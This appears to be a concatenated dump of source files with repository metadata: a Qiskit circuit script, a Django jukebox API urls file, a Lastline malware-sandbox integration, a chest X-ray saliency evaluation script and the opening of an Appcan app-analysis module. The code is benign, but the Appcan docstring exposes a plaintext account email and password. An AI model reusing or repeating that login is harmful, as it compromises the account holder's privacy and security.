prog.h(input_qubit[1]) # number=37
prog.cz(input_qubit[0],input_qubit[1]) # number=38
prog.h(input_qubit[1]) # number=39
prog.x(input_qubit[1]) # number=35
prog.cx(input_qubit[0],input_qubit[1]) # number=36
prog.x(input_qubit[2]) # number=11
prog.x(input_qubit[3]) # number=12
prog.cx(input_qubit[3],input_qubit[2]) # number=43
if n>=2:
prog.mcu1(pi,input_qubit[1:],input_qubit[0])
prog.x(input_qubit[0]) # number=13
prog.cx(input_qubit[0],input_qubit[1]) # number=22
prog.x(input_qubit[1]) # number=23
prog.cx(input_qubit[0],input_qubit[1]) # number=24
prog.x(input_qubit[2]) # number=15
prog.x(input_qubit[1]) # number=29
prog.y(input_qubit[4]) # number=28
prog.x(input_qubit[3]) # number=16
prog.h(input_qubit[0]) # number=17
prog.h(input_qubit[1]) # number=18
prog.h(input_qubit[2]) # number=19
prog.h(input_qubit[3]) # number=20
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
key = "00000"
f = lambda rep: str(int(rep == key))
prog = make_circuit(5,f)
IBMQ.load_account()
provider = IBMQ.get_provider(hub='ibm-q')
provider.backends()
backend = least_busy(provider.backends(filters=lambda x: x.configuration().n_qubits >= 2 and not x.configuration().simulator and x.status().operational == True))
sample_shot =7924
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_QC1087.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
5d6a826d059bd746ecd573c62d7103f05c0451af | 9a1e3d298ef432ba3e71eb3c2d5fbfc7d79ac0fb | /jukebox_pro/urls.py | b2a055badf6229e085230049d9d6b9a17f266e64 | [] | no_license | biswaranjan8/jukebox | 963a3eb943bd3ecee7c053299ec304f3bd47b669 | 2562c926cdf13d8d831db515c1ed484b9e6ad83e | refs/heads/main | 2023-04-04T05:33:40.082094 | 2021-04-13T17:26:27 | 2021-04-13T17:26:27 | 356,554,444 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,117 | py | from django.contrib import admin
from django.urls import path
from myapp import views
from myapp.views import MusiciansViewSet, Music_AlbumsViewSet
from rest_framework.routers import DefaultRouter
router = DefaultRouter()
router.register(r'musician', MusiciansViewSet, basename='musician')
router.register(r'musician_album', Music_AlbumsViewSet, basename='musician_album')
urlpatterns = router.urls
####################
# musician_album list => url "musician_album" request(get)
# musician_album Retrieve=> url "musician_album/(musician_album-id)" request(get)
# musician_album Create => url "/musician_album/" request(post) data_fields("musician","album_name","genre","price","description")
# musician_album_Update => url "musician_album/(musician_album-id)/" request(put) data_fields("musician","album_name","genre","price","description")
# musician_album_Delete => url "musician_album/(musician_album-id)/" request(delete)
# Musician list => url "musician" request(get)
# Musician Retrieve=> url "musician/(musician-id)" request(get)
# Musician Create => url "/musician/" request(post) data_fields("name","musician_type")
# Musician_Update => url "musician/(musician-id)/" request(put) data_fields("name","musician_type")
# Musician_Delete => url "musician/(musician-id)/" request(delete)
# List Of Music Album Sorted By date release ascending
# url => "musicalbum_retrieve/" request(get)
# List Of Music Album for a specific musician sorted by price ascending
# url => "musician_filter_price/(musician-id)/" request(get)
# List of Musician for specific music album sorted by Musician name ascending
# url => "musician_filter/(album-name)/" request(get)
####################
urlpatterns += [
path('admin/', admin.site.urls),
path('musicalbum_retrieve/', views.MusicAlbumRetrieve.as_view(), name='musicalbum_retrieve'),
path('musician_filter_price/<int:id>/', views.MusicAlbumFilterPrice.as_view(), name='MusicAlbumFilterPrice'),
path('musician_filter/<str:name>/', views.MusicAlbumFilter.as_view(), name='MusicAlbumFilter'),
]
| [
"nayakbn00@gmail.com"
] | nayakbn00@gmail.com |
9fda3ccf511019282d092f6d875ce3a82a9da52b | 1d8df63c441566f919bcd484c6d621a5e227d34a | /Integrations/Lastline_v2/Lastline_v2.py | 0668ac943f667a8fc5e31c8962415ca59db361fe | [
"MIT"
] | permissive | vvbaliga/content | 92b92d16dbbe4394c266e8cfce24abd2b92182b7 | cfc13a269b5e367f3219f42dafdfc23aa500e22f | refs/heads/master | 2021-01-04T02:14:19.919095 | 2020-02-13T14:22:22 | 2020-02-13T14:22:22 | 240,338,196 | 1 | 0 | MIT | 2020-02-13T18:59:47 | 2020-02-13T18:59:46 | null | UTF-8 | Python | false | false | 11,183 | py | import hashlib
from typing import Dict, List
from urllib3 import disable_warnings
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
INTEGRATION_COMMAND_NAME = "lastline"
INTEGRATION_NAME = "Lastline v2"
disable_warnings()
class Client(BaseClient):
MD5_LEN = 32
SHA1_LEN = 40
SHA256_LEN = 64
DEFAULT_THRESHOLD = 70
def __init__(self, base_url: str, api_params: Dict, verify=True, proxy=False):
self.command_params = api_params
super(Client, self).__init__(base_url, verify, proxy)
def file(self):
human_readable = ''
context_entry: Dict = {
'Lastline': list(),
'File': list(),
'DBotScore': list()
}
result = list()
hash_arg = argToList(self.command_params.get('file'))
for arg in hash_arg:
hash_type = hash_type_checker(arg)
self.command_params[hash_type] = arg
temp_result = self.http_request('/analysis/submit/file')
temp_human_readable, temp_context_entry = report_generator(temp_result)
human_readable += f'\n{temp_human_readable}'
context_entry['Lastline'].append(temp_context_entry.get('Lastline'))
context_entry['File'].append(temp_context_entry.get('File'))
context_entry['DBotScore'].append(temp_context_entry.get('DBotScore'))
result.append(temp_result)
del self.command_params[hash_type]
return human_readable, context_entry, result
def check_status(self):
result = self.http_request('/analysis/get')
human_readable, context_entry = report_generator(result)
return human_readable, context_entry, result
def get_report(self):
result = self.http_request('/analysis/get')
if 'data' in result and 'score' not in result['data']:
uuid = self.command_params.get('uuid')
raise DemistoException(f'task {uuid} is not ready')
human_readable, context_entry = report_generator(result)
return human_readable, context_entry, result
def get_task_list(self):
for param in ('before', 'after'):
if param in self.command_params:
self.command_params[param] = self.command_params[param].replace('T', ' ')
result = self.http_request('/analysis/get_completed')
if 'data' in result:
context_entry: List = self.get_status_and_time(argToList(result['data'].get('tasks')))
for i in range(len(context_entry)):
context_entry[i] = {
'UUID': context_entry[i][0],
'Time': context_entry[i][1],
'Status': context_entry[i][2]
}
human_readable = tableToMarkdown(name='tasks', t=context_entry, headers=['UUID', 'Time', 'Status'])
return human_readable, {}, result
def upload_file(self):
entry_id = self.command_params.get('EntryID')
self.command_params['push_to_portal'] = True
file_params = demisto.getFilePath(entry_id)
self.command_params['md5'] = file_hash(file_params.get('path'))
result = self.http_request('/analysis/submit/file',
headers={'Content-Type': 'multipart/form-data'},
files={file_params.get('name'): file_params.get('path')})
human_readable, context_entry = report_generator(result)
return human_readable, context_entry, result
def upload_url(self):
result = self.http_request('/analysis/submit/url')
human_readable, context_entry = report_generator(result)
return human_readable, context_entry, result
def test_module_command(self):
try:
self.get_report()
except DemistoException as error:
if str(error) == 'error Missing required field \'uuid\'.':
return 'ok', {}, {}
else:
raise error
def get_status_and_time(self, uuids) -> List[List]:
task_list: List[List] = []
for uuid in uuids:
self.command_params['uuid'] = uuid
result = self.http_request('/analysis/get')
if 'data' in result:
task_time = result['data'].get('submission')
if 'score' in result['data']:
status = 'Completed'
else:
status = 'Analyzing'
else:
task_time = status = ''
task_list.append([uuid, task_time.replace(' ', 'T'), status])
return task_list
def http_request(self, path: str, headers=None, files=None) -> Dict:
result: Dict = self._http_request('POST', path, params=self.command_params, headers=headers, files=files)
lastline_exception_handler(result)
return result
def lastline_exception_handler(result: Dict):
if result.get("success") is not None:
if result.get("success") == 0:
error_msg = "error "
if 'error_code' in result:
error_msg += "(" + str(result['error_code']) + ") "
if 'error' in result:
error_msg += result['error']
raise DemistoException(error_msg)
else:
raise DemistoException('No response')
def hash_type_checker(hash_file: str) -> str:
hash_types = {
str(Client.MD5_LEN): 'md5',
str(Client.SHA1_LEN): 'sha1',
str(Client.SHA256_LEN): 'sha256',
}
hash_type = hash_types.get(str(len(hash_file)))
if hash_type is not None:
return hash_type
else:
raise DemistoException(f'{INTEGRATION_NAME} File command support md5/ sha1/ sha256 only.')
def report_generator(result: Dict, threshold=None):
context_entry: Dict = get_report_context(result, threshold)
if 'File' in context_entry:
key = 'File'
elif 'URL' in context_entry:
key = 'URL'
else:
key = ''
score = result['data'].get('score')
uuid = result['data'].get('task_uuid')
submission_time = result['data'].get('submission')
indicator = context_entry['DBotScore'].get('Indicator')
if score is not None:
meta_data = f'**Score: {score}**\n\nTask UUID: {uuid}\nSubmission Time: {submission_time}'
else:
meta_data = '**Status: Analyzing**'
human_readable = tableToMarkdown(name=f'Lastline analysis for {key.lower()}: {indicator}',
metadata=meta_data,
t=context_entry.get(key))
return human_readable, context_entry
def get_report_context(result: Dict, threshold=None) -> Dict:
key = 'File'
context_entry: Dict = {}
if 'data' in result:
data: Dict = {}
dbotscore: Dict = {
'Vendor': 'Lastline',
'Score': 0
}
if 'score' in result['data']:
status = 'Completed'
if threshold is None:
threshold = Client.DEFAULT_THRESHOLD
score = result['data']['score']
if score > threshold:
dbotscore['Score'] = 3
data['Malicious'] = {
'Vendor': 'Lastline',
'Score': score
}
elif score > 30:
dbotscore['Score'] = 2
else:
dbotscore['Score'] = 1
else:
status = 'Analyzing'
lastline: Dict = {
'Submission': {
'Status': status,
'UUID': result['data'].get('task_uuid'),
'SubmissionTime': result['data'].get('submission')
}
}
if 'analysis_subject' in result['data']:
analysis_subject: Dict = result['data']['analysis_subject']
temp_dict: Dict = {
'YaraSignatures': analysis_subject.get('yara_signatures'),
'DNSqueries': analysis_subject.get('dns_queries'),
'NetworkConnections': analysis_subject.get('network_connections'),
'DownloadedFiles': analysis_subject.get('downloaded_files'),
'Process': analysis_subject.get('process'),
'DomainDetections': analysis_subject.get('domain_detections'),
'IPdetections': analysis_subject.get('ip_detections'),
'URLdetections': analysis_subject.get('url_detections')
}
temp_dict = {keys: values for keys, values in temp_dict.items() if values}
lastline['Submission'].update(temp_dict)
if 'url' in analysis_subject:
key = 'URL'
dbotscore['Indicator'] = analysis_subject['url']
data['Data'] = analysis_subject.get('url')
else:
dbotscore['Indicator'] = analysis_subject.get('md5')
dbotscore['Type'] = 'hash'
data['MD5'] = analysis_subject.get('md5')
data['SHA1'] = analysis_subject.get('sha1')
data['SHA256'] = analysis_subject.get('sha256')
data['Type'] = analysis_subject.get('mime_type')
dbotscore['Type'] = key
context_entry['Lastline'] = lastline
context_entry[key] = data
if dbotscore['Score'] != 0:
context_entry['DBotScore'] = dbotscore
return context_entry
def file_hash(path: str) -> str:
block_size = 65536
file_hasher = hashlib.md5()
with open(path, 'rb') as file_obj:
buf = file_obj.read(block_size)
while len(buf) > 0:
file_hasher.update(buf)
buf = file_obj.read(block_size)
return file_hasher.hexdigest()
def main():
params = demisto.params()
base_url = params.get('url')
verify_ssl = not params.get('insecure', False)
proxy = params.get('proxy')
api_params = {
'key': params.get('api_key'),
'api_token': params.get('api_token')
}
api_params.update(demisto.args())
client = Client(base_url, api_params, verify=verify_ssl, proxy=proxy)
command = demisto.command()
demisto.debug(f'Command being called is {command}')
# Switch case
commands = {
'test-module': Client.test_module_command,
'file': Client.file,
f'{INTEGRATION_COMMAND_NAME}-check-status': Client.check_status,
f'{INTEGRATION_COMMAND_NAME}-get-report': Client.get_report,
f'{INTEGRATION_COMMAND_NAME}-get-task-list': Client.get_task_list,
f'{INTEGRATION_COMMAND_NAME}-upload-file': Client.upload_file,
f'{INTEGRATION_COMMAND_NAME}-upload-url': Client.upload_url
}
try:
if command in commands:
readable_output, outputs, raw_response = commands[command](client)
return_outputs(readable_output, outputs, raw_response)
else:
raise DemistoException(f'{demisto.command()} is not a command')
# Log exceptions
except Exception as every_error:
err_msg = f'Error in {INTEGRATION_NAME} Integration [{every_error}]'
return_error(err_msg, error=every_error)
if __name__ in ("__builtin__", "builtins"):
main()
| [
"esahrf@paloaltonetworks.com"
] | esahrf@paloaltonetworks.com |
27b5cb328b18cf7b99b10672ad129945318772c3 | f150124bf523163bbdf26d99b3c67172e2d79df6 | /model/visualize_prediction.py | e9693add444fe891db63a9c8df3c5bec07f2fb39 | [
"MIT",
"BSD-3-Clause"
] | permissive | CAMP-eXplain-AI/CheXplain-IBA | 036a50633977de02e4810720095e7529819f4e53 | 8290f946e4b1f454eb350a6cfa4b38e79312b109 | refs/heads/master | 2023-06-27T20:58:48.820866 | 2021-03-31T13:32:43 | 2021-03-31T13:32:43 | 353,364,372 | 10 | 1 | null | null | null | null | UTF-8 | Python | false | false | 21,246 | py | from __future__ import print_function, division
# pytorch imports
import torch
from torchray.attribution.grad_cam import grad_cam
from torchvision import transforms
# image / graphics imports
from PIL import Image
from pylab import *
import seaborn as sns
import matplotlib.patches as patches
import matplotlib.pyplot as plt
# data science
import numpy as np
import pandas as pd
from scipy import ndimage
# import other modules
import cxr_dataset as CXR
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
def calc_cam(x, label, model):
"""
function to generate a class activation map corresponding to a torch image tensor
Args:
x: the 1x3x224x224 pytorch tensor file that represents the NIH CXR
label:user-supplied label you wish to get class activation map for; must be in FINDINGS list
model: densenet121 trained on NIH CXR data
Returns:
cam_torch: 224x224 torch tensor containing activation map
"""
FINDINGS = [
'Atelectasis',
'Cardiomegaly',
'Effusion',
'Infiltrate',
'Mass',
'Nodule',
'Pneumonia',
'Pneumothorax',
'Consolidation',
'Edema',
'Emphysema',
'Fibrosis',
'Pleural_Thickening',
'Hernia']
if label not in FINDINGS:
raise ValueError(
str(label) +
"is an invalid finding - please use one of " +
str(FINDINGS))
# find index for label; this corresponds to index from output of net
label_index = next(
(x for x in range(len(FINDINGS)) if FINDINGS[x] == label))
# define densenet_last_layer class so we can get last 1024 x 7 x 7 output
# of densenet for class activation map
class densenet_last_layer(torch.nn.Module):
def __init__(self, model):
super(densenet_last_layer, self).__init__()
DenseNet_Module = list(model.children())[0]
self.features = torch.nn.Sequential(
*list(DenseNet_Module.children())[:-1]
)
def forward(self, x):
x = self.features(x)
x = torch.nn.functional.relu(x)
return x
# instantiate cam model and get output
model_cam = densenet_last_layer(model)
y = model_cam(x)
y = y.cpu().data.numpy()
y = np.squeeze(y)
# pull weights corresponding to the 1024 layers from model
weights = model.state_dict()['classifier.weight']
weights = weights.cpu().numpy()
bias = model.state_dict()['classifier.bias']
bias = bias.cpu().numpy()
# Calculating cams for all classes at the same time, however for the bounding box test data set
# it would be of no use, since each image only has one class
# weights = weights[:, :, np.newaxis, np.newaxis]
# cams = np.multiply(weights, y)
# cams = np.sum(cams, axis=1).squeeze()
# bias = bias[:, np.newaxis, np.newaxis]
# cams += bias
# cam = cams[label_index]
class_weights = weights[label_index]
class_weights = class_weights[:, np.newaxis, np.newaxis]
cam = np.multiply(class_weights, y)
cam = np.sum(cam, axis=0).squeeze()
cam += bias[label_index]
return cam
def load_data(
PATH_TO_IMAGES,
LABEL,
PATH_TO_MODEL,
fold,
POSITIVE_FINDINGS_ONLY=None,
covid=False):
"""
Loads dataloader and torchvision model
Args:
PATH_TO_IMAGES: path to NIH CXR images
LABEL: finding of interest (must exactly match one of FINDINGS defined below or will get error)
PATH_TO_MODEL: path to downloaded pretrained model or your own retrained model
POSITIVE_FINDINGS_ONLY: dataloader will show only examples + for LABEL pathology if True, otherwise shows positive
and negative examples if false
Returns:
dataloader: dataloader with test examples to show
model: fine tuned torchvision densenet-121
"""
checkpoint = torch.load(PATH_TO_MODEL, map_location=lambda storage, loc: storage)
model = checkpoint['model']
del checkpoint
model = model.module.to(device)
# model.eval()
# for param in model.parameters():
# param.requires_grad_(False)
# build dataloader on test
mean = [0.485, 0.456, 0.406]
std = [0.229, 0.224, 0.225]
data_transform = transforms.Compose([
transforms.Resize(224),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean, std)
])
if not covid:
bounding_box_transform = CXR.RescaleBB(224, 1024)
if not POSITIVE_FINDINGS_ONLY:
finding = "any"
else:
finding = LABEL
dataset = CXR.CXRDataset(
path_to_images=PATH_TO_IMAGES,
fold=fold,
transform=data_transform,
transform_bb=bounding_box_transform,
finding=finding)
else:
dataset = CXR.CXRDataset(
path_to_images=PATH_TO_IMAGES,
fold=fold,
transform=data_transform,
fine_tune=True)
dataloader = torch.utils.data.DataLoader(
dataset, batch_size=1, shuffle=False, num_workers=1)
return iter(dataloader), model
def show_next(cxr, model, label, inputs, filename, bbox):
"""
Plots CXR, activation map of CXR, and shows model probabilities of findings
Args:
dataloader: dataloader of test CXRs
model: fine-tuned torchvision densenet-121
LABEL: finding we're interested in seeing heatmap for
Returns:
None (plots output)
"""
raw_cam = calc_cam(inputs, label, model)
print('range:')
print(np.ptp(raw_cam))
print('percerntile:')
print(np.percentile(raw_cam, 4))
print('avg:')
print(np.mean(raw_cam))
raw_cam = np.array(Image.fromarray(raw_cam.squeeze()).resize((224, 224), Image.NEAREST))
# bounding box as a mask
bbox_mask = np.zeros(raw_cam.shape, dtype=bool)
bbox_mask[bbox[0, 1]: bbox[0, 1] + bbox[0, 3], bbox[0, 0]: bbox[0, 0] + bbox[0, 2]] = True
bbox_area_ratio = (bbox_mask.sum() / bbox_mask.size) * 100
activation_mask = np.logical_or(raw_cam >= 180, raw_cam <= 60)
heat_mask = np.logical_and(raw_cam < 180, raw_cam > 60)
# finding components in heatmap
label_im, nb_labels = ndimage.label(activation_mask)
# print('nb_labels:')
# print(nb_labels)
# print('label_im:')
# print(label_im)
# heat_mask = label_im == 0
#
# components_masks = []
# for label in range(1, nb_labels + 1):
# component_mask = label_im == label
# components_masks.append(component_mask)
object_slices = ndimage.find_objects(label_im)
detected_patchs = []
for object_slice in object_slices:
y_slice = object_slice[0]
x_slice = object_slice[1]
xy_corner = (x_slice.start, y_slice.start)
x_length = x_slice.stop - x_slice.start
y_length = y_slice.stop - y_slice.start
detected_patch = patches.Rectangle(xy_corner, x_length, y_length, linewidth=2, edgecolor='m',
facecolor='none', zorder=2)
detected_patchs.append(detected_patch)
print(object_slice)
object_masks = []
for object_slice in object_slices:
object_mask = np.zeros(label_im.shape, dtype=bool)
object_mask[object_slice[0], object_slice[1]] = True
object_masks.append(object_mask)
object_masks = np.array(object_masks)
object_masks_union = np.logical_or.reduce(object_masks)
def compute_ior(activated_mask, gt_mask):
intersection_mask = np.logical_and(activated_mask, gt_mask)
detected_region_area = np.sum(activated_mask)
# print('detected_area:')
# print(detected_region_area)
intersection_area = np.sum(intersection_mask)
# print('intersection:')
# print(intersection_area)
ior = intersection_area / detected_region_area
return ior
ior = compute_ior(activation_mask, bbox_mask)
print('ior:')
print(ior)
iobb = compute_ior(object_masks_union, bbox_mask)
print('iobb:')
print(iobb)
fig, (showcxr, heatmap) = plt.subplots(ncols=2, figsize=(14, 5))
hmap = sns.heatmap(raw_cam.squeeze(),
cmap='viridis',
# vmin= -200, vmax=100,
mask=heat_mask,
# alpha = 0.8, # whole heatmap is translucent
annot=False,
zorder=2,
linewidths=0)
hmap.imshow(cxr, zorder=1) # put the map under the heatmap
hmap.axis('off')
hmap.set_title('Own Implementation for category {}'.format(label), fontsize=8)
rect = patches.Rectangle((bbox[0, 0], bbox[0, 1]), bbox[0, 2], bbox[0, 3], linewidth=2, edgecolor='r',
facecolor='none', zorder=2)
hmap.add_patch(rect)
for patch in detected_patchs:
hmap.add_patch(patch)
rect_original = patches.Rectangle((bbox[0, 0], bbox[0, 1]), bbox[0, 2], bbox[0, 3], linewidth=2, edgecolor='r',
facecolor='none', zorder=2)
showcxr.imshow(cxr)
showcxr.axis('off')
showcxr.set_title(filename[0])
showcxr.add_patch(rect_original)
# plt.savefig(str(LABEL+"_P"+str(predx[label_index])+"_file_"+filename[0]))
plt.show()
def eval_localization(dataloader, model, LABEL, map_thresholds, percentiles, ior_threshold=0.1, method='ior'):
num_correct_pred = 0
num_images_examined = 0
def compute_ior(activated_masks, gt_mask):
intersection_masks = np.logical_and(activated_masks, gt_mask)
detected_region_areas = np.sum(activated_masks, axis=(1, 2))
intersection_areas = np.sum(intersection_masks, axis=(1, 2))
ior = np.divide(intersection_areas, detected_region_areas)
return ior
def compute_iou(activated_masks, gt_mask):
intersection_masks = np.logical_and(activated_masks, gt_mask)
union_masks = np.logical_or(activated_masks, gt_mask)
intersection_areas = np.sum(intersection_masks, axis=(1, 2))
union_areas = np.sum(union_masks, axis=(1, 2))
iou = np.divide(intersection_areas, union_areas)
return iou
map_thresholds = np.array(map_thresholds)
map_thresholds = map_thresholds[:, np.newaxis, np.newaxis]
for data in dataloader:
inputs, labels, filename, bbox = data
num_images_examined += 1
# get cam map
inputs = inputs.to(device)
raw_cam = calc_cam(inputs, LABEL, model)
raw_cam = np.array(Image.fromarray(raw_cam.squeeze()).resize((224, 224), Image.NEAREST))
raw_cams = np.broadcast_to(raw_cam, shape=(len(map_thresholds), raw_cam.shape[0], raw_cam.shape[1]))
activation_masks = np.greater_equal(raw_cams, map_thresholds)
# bounding box as a mask
bbox = bbox.type(torch.cuda.IntTensor)
bbox_mask = np.zeros(raw_cam.shape, dtype=bool)
bbox_mask[bbox[0, 1]: bbox[0, 1] + bbox[0, 3], bbox[0, 0]: bbox[0, 0] + bbox[0, 2]] = True
if method == 'iobb':
object_masks_union_all_thresholds = []
for activation_mask in activation_masks:
label_im, nb_labels = ndimage.label(activation_mask)
object_slices = ndimage.find_objects(label_im)
object_masks = []
for object_slice in object_slices:
object_mask = np.zeros(label_im.shape, dtype=bool)
object_mask[object_slice[0], object_slice[1]] = True
object_masks.append(object_mask)
object_masks = np.array(object_masks)
object_masks_union = np.logical_or.reduce(object_masks)
object_masks_union_all_thresholds.append(object_masks_union)
object_masks_union_all_thresholds = np.array(object_masks_union_all_thresholds)
iobb = compute_ior(object_masks_union_all_thresholds, bbox_mask)
num_correct_pred += np.greater_equal(iobb, ior_threshold)
if method == 'ior':
ior = compute_ior(activation_masks, bbox_mask)
num_correct_pred += np.greater_equal(ior, ior_threshold)
if method == 'ior_percentile_dynamic':
bbox_area_ratio = (bbox_mask.sum() / bbox_mask.size) * 100
activation_mask = raw_cam >= np.percentile(raw_cam, (100 - bbox_area_ratio))
intersection = np.logical_and(activation_mask, bbox_mask)
ior = intersection.sum() / activation_mask.sum()
num_correct_pred += np.greater_equal(ior, ior_threshold)
if method == 'ior_percentile_static':
activation_masks = []
for percentile in percentiles:
activation_mask = raw_cam >= np.percentile(raw_cam, 100 - percentile)
activation_masks.append(activation_mask)
activation_masks = np.array(activation_masks)
ior = compute_ior(activation_masks, bbox_mask)
num_correct_pred += np.greater_equal(ior, ior_threshold)
if method == 'iou':
iou = compute_iou(activation_masks, bbox_mask)
num_correct_pred += np.greater_equal(iou, ior_threshold)
if method == 'iou_percentile_dynamic':
bbox_area_ratio = (bbox_mask.sum() / bbox_mask.size) * 100
activation_mask = raw_cam >= np.percentile(raw_cam, (100 - bbox_area_ratio))
intersection = np.logical_and(activation_mask, bbox_mask)
union = np.logical_or(activation_mask, bbox_mask)
iou = intersection.sum() / union.sum()
num_correct_pred += np.greater_equal(iou, ior_threshold)
if method == 'iou_percentile_static':
activation_masks = []
for percentile in percentiles:
activation_mask = raw_cam >= np.percentile(raw_cam, 100 - percentile)
activation_masks.append(activation_mask)
activation_masks = np.array(activation_masks)
iou = compute_iou(activation_masks, bbox_mask)
num_correct_pred += np.greater_equal(iou, ior_threshold)
if method == 'iou_percentile_bb_dynamic':
bbox_area_ratio = (bbox_mask.sum() / bbox_mask.size) * 100
activation_mask = raw_cam >= np.percentile(raw_cam, (100 - bbox_area_ratio))
label_im, nb_labels = ndimage.label(activation_mask)
object_slices = ndimage.find_objects(label_im)
object_masks = []
for object_slice in object_slices:
object_mask = np.zeros(label_im.shape, dtype=bool)
object_mask[object_slice[0], object_slice[1]] = True
if (np.logical_and(object_mask, bbox_mask)).sum() > 0:
object_masks.append(object_mask)
object_masks = np.array(object_masks)
object_masks = np.logical_or.reduce(object_masks)
intersection = np.logical_and(object_masks, bbox_mask)
union = np.logical_or(object_masks, bbox_mask)
iou = intersection.sum() / union.sum()
num_correct_pred += np.greater_equal(iou, ior_threshold)
if method == 'iou_percentile_bb_dynamic_nih':
bbox_area_ratio = (bbox_mask.sum() / bbox_mask.size) * 100
activation_mask = raw_cam >= np.percentile(raw_cam, (100 - bbox_area_ratio))
label_im, nb_labels = ndimage.label(activation_mask)
object_slices = ndimage.find_objects(label_im)
object_masks = []
for object_slice in object_slices:
object_mask = np.zeros(label_im.shape, dtype=bool)
object_mask[object_slice[0], object_slice[1]] = True
if (np.logical_and(object_mask, bbox_mask)).sum() > 0:
object_masks.append(object_mask)
if len(object_masks) > 0:
object_masks = np.array(object_masks)
# object_masks = np.logical_or.reduce(object_masks)
intersection = np.logical_and(object_masks, bbox_mask)
union = np.logical_or(object_masks, bbox_mask)
iou = intersection.sum(axis=(1, 2)) / union.sum(axis=(1, 2))
iou = np.amax(iou)
num_correct_pred += np.greater_equal(iou, ior_threshold)
if method == 'ior_percentile_bb_dynamic_nih':
bbox_area_ratio = (bbox_mask.sum() / bbox_mask.size) * 100
activation_mask = raw_cam >= np.percentile(raw_cam, (100 - bbox_area_ratio))
label_im, nb_labels = ndimage.label(activation_mask)
object_slices = ndimage.find_objects(label_im)
object_masks = []
for object_slice in object_slices:
object_mask = np.zeros(label_im.shape, dtype=bool)
object_mask[object_slice[0], object_slice[1]] = True
if (np.logical_and(object_mask, bbox_mask)).sum() > 0:
object_masks.append(object_mask)
if len(object_masks) > 0:
object_masks = np.array(object_masks)
# object_masks = np.logical_or.reduce(object_masks)
intersection = np.logical_and(object_masks, bbox_mask)
# union = np.logical_or(object_masks, bbox_mask)
iou = intersection.sum(axis=(1, 2)) / object_masks.sum(axis=(1, 2))
iou = np.amax(iou)
num_correct_pred += np.greater_equal(iou, ior_threshold)
accuracy = num_correct_pred / num_images_examined
return accuracy
def plot_map(model, dataloader, label=None, covid=False, saliency_layer=None):
"""Plot an example.
Args:
model: trained classification model
dataloader: containing input images.
label (str): Name of Category.
covid: whether the image is from the Covid Dataset or the Chesxtray Dataset.
saliency_layer: usually output of the last convolutional layer.
"""
if not covid:
FINDINGS = [
'Atelectasis',
'Cardiomegaly',
'Effusion',
'Infiltration',
'Mass',
'Nodule',
'Pneumonia',
'Pneumothorax',
'Consolidation',
'Edema',
'Emphysema',
'Fibrosis',
'Pleural_Thickening',
'Hernia']
else:
FINDINGS = [
'Detector01',
'Detector2',
'Detector3']
try:
if not covid:
inputs, labels, filename, bbox = next(dataloader)
bbox = bbox.type(torch.cuda.IntTensor)
else:
inputs, labels, filename = next(dataloader)
except StopIteration:
print("All examples exhausted - rerun cells above to generate new examples to review")
return None
original = inputs.clone()
inputs = inputs.to(device)
original = original.to(device)
original.requires_grad = True
# create predictions for label of interest and all labels
pred = torch.sigmoid(model(original)).data.cpu().numpy()[0]
predx = ['%.3f' % elem for elem in list(pred)]
preds_concat = pd.concat([pd.Series(FINDINGS), pd.Series(predx), pd.Series(labels.numpy().astype(bool)[0])], axis=1)
preds = pd.DataFrame(data=preds_concat)
preds.columns = ["Finding", "Predicted Probability", "Ground Truth"]
preds.set_index("Finding", inplace=True)
preds.sort_values(by='Predicted Probability', inplace=True, ascending=False)
cxr = inputs.data.cpu().numpy().squeeze().transpose(1, 2, 0)
mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
cxr = std * cxr + mean
cxr = np.clip(cxr, 0, 1)
if not covid:
show_next(cxr, model, label, inputs, filename, bbox)
if covid and label is None:
label = preds.loc[preds["Ground Truth"]==True].index[0]
category_id = FINDINGS.index(label)
saliency = grad_cam(model, original, category_id, saliency_layer=saliency_layer)
fig, (showcxr, heatmap) = plt.subplots(ncols=2, figsize=(14, 5))
showcxr.imshow(cxr)
showcxr.axis('off')
showcxr.set_title(filename[0])
if not covid:
rect_original = patches.Rectangle((bbox[0, 0], bbox[0, 1]), bbox[0, 2], bbox[0, 3], linewidth=2, edgecolor='r',
facecolor='none', zorder=2)
showcxr.add_patch(rect_original)
hmap = sns.heatmap(saliency.detach().cpu().numpy().squeeze(),
cmap='viridis',
annot=False,
zorder=2,
linewidths=0)
hmap.axis('off')
hmap.set_title('TorchRay grad cam for category {}'.format(label), fontsize=8)
plt.show()
print(preds)
if covid:
data_brixia = pd.read_csv("model/labels/metadata_global_v2.csv", sep=";")
data_brixia.set_index("Filename", inplace=True)
score = data_brixia.loc[filename[0].replace(".jpg", ".dcm"), "BrixiaScore"].astype(str)
print('Brixia 6 regions Score: ', '0' * (6 - len(score)) + score)
| [
"wejdene.mansour@tum.de"
] | wejdene.mansour@tum.de |
8e74721036b29b8a8216fad57f39683db7962052 | f1e977eeda53904e918a870e2d835c28d99240e5 | /libs/modules/Appcan/Appcan_webapp.py | be53ed81cb0222c9cadc5ea44869d712a9b013a3 | [] | no_license | beizishaozi/HyBridApp | 263e7f0d726647eb5ae45f362e9fd8a9a64847a5 | a2d2585c77601b88ceaf3ace51752b4a19cec397 | refs/heads/master | 2023-01-28T11:15:44.428354 | 2020-12-04T11:41:20 | 2020-12-04T11:41:20 | 316,420,979 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,344 | py | #!/usr/bin/env python3
import logging
import sys
import jpype
import zipfile
import shutil
try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
import os
from libs.modules.BaseModule import BaseModule
'''reference libs modules need to put the directory of this project in $path variable'''
logging.basicConfig(stream=sys.stdout, format="%(levelname)s: %(message)s", level=logging.INFO)
log = logging.getLogger(__name__)
'''
Reference:
1) http://newdocx.appcan.cn/quickstart/create-app //username=984363019@qq.com passwd=beizishaozi
'''
